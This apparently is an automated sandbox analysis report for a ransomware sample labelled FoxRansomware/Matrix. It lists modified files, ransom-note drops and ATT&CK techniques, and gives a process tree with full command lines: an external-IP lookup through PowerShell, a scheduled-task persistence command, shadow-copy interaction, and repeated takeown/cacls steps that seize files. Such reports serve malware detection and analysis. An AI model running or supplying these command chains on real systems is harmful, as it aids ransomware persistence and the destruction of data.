File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Thimphu	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\en-US\Hearts.exe.mui	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Argentina\La_Rioja	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\EET	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP.bat	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vevay	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Purble Place\en-US\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-8	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Havana	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\de-DE\SpiderSolitaire.exe.mui	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\WriteBackup.ps1	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\nb.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\security\blacklist	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

3376 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

3348 vssadmin.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exesOCkujKF64.exe

pid process

2460 powershell.exe
2760 sOCkujKF64.exe
2760 sOCkujKF64.exe
2760 sOCkujKF64.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

sOCkujKF64.exe

pid process

2760 sOCkujKF64.exe

pid	process
3376	schtasks.exe

pid	process
3348	vssadmin.exe

pid	process
2460	powershell.exe
2760	sOCkujKF64.exe
2760	sOCkujKF64.exe
2760	sOCkujKF64.exe

pid	process
2760	sOCkujKF64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exesOCkujKF64.exevssvc.exetakeown.exetakeown.exetakeown.exetakeown.exeWMIC.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	2760	sOCkujKF64.exe
Token: SeLoadDriverPrivilege	2760	sOCkujKF64.exe
Token: SeBackupPrivilege	764	vssvc.exe
Token: SeRestorePrivilege	764	vssvc.exe
Token: SeAuditPrivilege	764	vssvc.exe
Token: SeTakeOwnershipPrivilege	1684	takeown.exe
Token: SeTakeOwnershipPrivilege	2152	takeown.exe
Token: SeTakeOwnershipPrivilege	1588	takeown.exe
Token: SeTakeOwnershipPrivilege	3736	takeown.exe
Token: SeIncreaseQuotaPrivilege	2292	WMIC.exe
Token: SeSecurityPrivilege	2292	WMIC.exe
Token: SeTakeOwnershipPrivilege	2292	WMIC.exe
Token: SeLoadDriverPrivilege	2292	WMIC.exe
Token: SeSystemProfilePrivilege	2292	WMIC.exe
Token: SeSystemtimePrivilege	2292	WMIC.exe
Token: SeProfSingleProcessPrivilege	2292	WMIC.exe
Token: SeIncBasePriorityPrivilege	2292	WMIC.exe
Token: SeCreatePagefilePrivilege	2292	WMIC.exe
Token: SeBackupPrivilege	2292	WMIC.exe
Token: SeRestorePrivilege	2292	WMIC.exe
Token: SeShutdownPrivilege	2292	WMIC.exe
Token: SeDebugPrivilege	2292	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2292	WMIC.exe
Token: SeRemoteShutdownPrivilege	2292	WMIC.exe
Token: SeUndockPrivilege	2292	WMIC.exe
Token: SeManageVolumePrivilege	2292	WMIC.exe
Token: 33	2292	WMIC.exe
Token: 34	2292	WMIC.exe
Token: 35	2292	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2292	WMIC.exe
Token: SeSecurityPrivilege	2292	WMIC.exe
Token: SeTakeOwnershipPrivilege	2292	WMIC.exe
Token: SeLoadDriverPrivilege	2292	WMIC.exe
Token: SeSystemProfilePrivilege	2292	WMIC.exe
Token: SeSystemtimePrivilege	2292	WMIC.exe
Token: SeProfSingleProcessPrivilege	2292	WMIC.exe
Token: SeIncBasePriorityPrivilege	2292	WMIC.exe
Token: SeCreatePagefilePrivilege	2292	WMIC.exe
Token: SeBackupPrivilege	2292	WMIC.exe
Token: SeRestorePrivilege	2292	WMIC.exe
Token: SeShutdownPrivilege	2292	WMIC.exe
Token: SeDebugPrivilege	2292	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2292	WMIC.exe
Token: SeRemoteShutdownPrivilege	2292	WMIC.exe
Token: SeUndockPrivilege	2292	WMIC.exe
Token: SeManageVolumePrivilege	2292	WMIC.exe
Token: 33	2292	WMIC.exe
Token: 34	2292	WMIC.exe
Token: 35	2292	WMIC.exe
Token: SeTakeOwnershipPrivilege	1560	takeown.exe
Token: SeTakeOwnershipPrivilege	4464	takeown.exe
Token: SeTakeOwnershipPrivilege	4504	takeown.exe
Token: SeTakeOwnershipPrivilege	4764	takeown.exe
Token: SeTakeOwnershipPrivilege	4860	takeown.exe
Token: SeTakeOwnershipPrivilege	2248	takeown.exe
Token: SeTakeOwnershipPrivilege	2604	takeown.exe
Token: SeTakeOwnershipPrivilege	3908	takeown.exe
Token: SeTakeOwnershipPrivilege	4180	takeown.exe
Token: SeTakeOwnershipPrivilege	1488	takeown.exe
Token: SeTakeOwnershipPrivilege	2464	takeown.exe
Token: SeTakeOwnershipPrivilege	108	takeown.exe
Token: SeTakeOwnershipPrivilege	1544	takeown.exe
Token: SeTakeOwnershipPrivilege	692	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.execmd.execmd.execmd.exewscript.execmd.execmd.exe

description	pid	process	target process
PID 2148 wrote to memory of 2400	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 2400	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 2400	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 2400	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 2344	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	NWaVfX3D.exe
PID 2148 wrote to memory of 2344	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	NWaVfX3D.exe
PID 2148 wrote to memory of 2344	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	NWaVfX3D.exe
PID 2148 wrote to memory of 2344	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	NWaVfX3D.exe
PID 2148 wrote to memory of 3004	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 3004	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 3004	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 3004	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 3004 wrote to memory of 2460	3004	cmd.exe	powershell.exe
PID 3004 wrote to memory of 2460	3004	cmd.exe	powershell.exe
PID 3004 wrote to memory of 2460	3004	cmd.exe	powershell.exe
PID 3004 wrote to memory of 2460	3004	cmd.exe	powershell.exe
PID 2148 wrote to memory of 2664	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 2664	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 2664	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 2664	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 2888	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 2888	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 2888	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 2888	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2888 wrote to memory of 520	2888	cmd.exe	wscript.exe
PID 2888 wrote to memory of 520	2888	cmd.exe	wscript.exe
PID 2888 wrote to memory of 520	2888	cmd.exe	wscript.exe
PID 2888 wrote to memory of 520	2888	cmd.exe	wscript.exe
PID 2664 wrote to memory of 2292	2664	cmd.exe	reg.exe
PID 2664 wrote to memory of 2292	2664	cmd.exe	reg.exe
PID 2664 wrote to memory of 2292	2664	cmd.exe	reg.exe
PID 2664 wrote to memory of 2292	2664	cmd.exe	reg.exe
PID 2664 wrote to memory of 2464	2664	cmd.exe	reg.exe
PID 2664 wrote to memory of 2464	2664	cmd.exe	reg.exe
PID 2664 wrote to memory of 2464	2664	cmd.exe	reg.exe
PID 2664 wrote to memory of 2464	2664	cmd.exe	reg.exe
PID 2664 wrote to memory of 2848	2664	cmd.exe	reg.exe
PID 2664 wrote to memory of 2848	2664	cmd.exe	reg.exe
PID 2664 wrote to memory of 2848	2664	cmd.exe	reg.exe
PID 2664 wrote to memory of 2848	2664	cmd.exe	reg.exe
PID 2148 wrote to memory of 3048	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 3048	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 3048	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 2148 wrote to memory of 3048	2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 520 wrote to memory of 4012	520	wscript.exe	cmd.exe
PID 520 wrote to memory of 4012	520	wscript.exe	cmd.exe
PID 520 wrote to memory of 4012	520	wscript.exe	cmd.exe
PID 520 wrote to memory of 4012	520	wscript.exe	cmd.exe
PID 3048 wrote to memory of 1604	3048	cmd.exe	cacls.exe
PID 3048 wrote to memory of 1604	3048	cmd.exe	cacls.exe
PID 3048 wrote to memory of 1604	3048	cmd.exe	cacls.exe
PID 3048 wrote to memory of 1604	3048	cmd.exe	cacls.exe
PID 4012 wrote to memory of 3376	4012	cmd.exe	schtasks.exe
PID 4012 wrote to memory of 3376	4012	cmd.exe	schtasks.exe
PID 4012 wrote to memory of 3376	4012	cmd.exe	schtasks.exe
PID 4012 wrote to memory of 3376	4012	cmd.exe	schtasks.exe
PID 3048 wrote to memory of 1760	3048	cmd.exe	takeown.exe
PID 3048 wrote to memory of 1760	3048	cmd.exe	takeown.exe
PID 3048 wrote to memory of 1760	3048	cmd.exe	takeown.exe
PID 3048 wrote to memory of 1760	3048	cmd.exe	takeown.exe
PID 3048 wrote to memory of 3952	3048	cmd.exe	cmd.exe
PID 3048 wrote to memory of 3952	3048	cmd.exe	cmd.exe
PID 3048 wrote to memory of 3952	3048	cmd.exe	cmd.exe
PID 3048 wrote to memory of 3952	3048	cmd.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"
1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2148
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWaVfX3D.exe"
  2⤵
  PID:2400
- C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWaVfX3D.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWaVfX3D.exe" -n
  2⤵
  - Executes dropped EXE
  PID:2344
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Wo6r9M7V.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3004
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2460
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IhklkhQE.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2664
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IhklkhQE.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2292
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:2848
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\kixASbnx.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2888
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\kixASbnx.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:520
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\fMynkeEd.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4012
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\fMynkeEd.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:3376
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:1792
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:2236
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "Dynamic.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3952
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "Dynamic.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:852
    - - C:\Users\Admin\AppData\Local\Temp\sOCkujKF64.exe
        
        sOCkujKF.exe -accepteula "Dynamic.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:2760
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
  2⤵
  - Loads dropped DLL
  PID:3252
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
    3⤵
    PID:2604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
    3⤵
    PID:3624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SignHere.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2016
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "SignHere.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:2412
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1176
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  - Loads dropped DLL
  PID:2292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:3660
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    PID:3316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1588
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:2632
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2268
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Loads dropped DLL
  PID:1704
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    PID:108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1468
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:3232
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
  2⤵
  - Loads dropped DLL
  PID:1112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "AdobeID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1724
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "AdobeID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:3104
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2088
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  - Loads dropped DLL
  PID:3172
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
    3⤵
    PID:2080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    PID:3720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3240
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:2236
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  - Loads dropped DLL
  PID:3024
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    PID:2060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "DefaultID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3800
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:776
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""
  2⤵
  - Loads dropped DLL
  PID:4232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C
    3⤵
    PID:4260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"
    3⤵
    PID:4272
- - C:\Windows\SysWOW64\cmd.exe
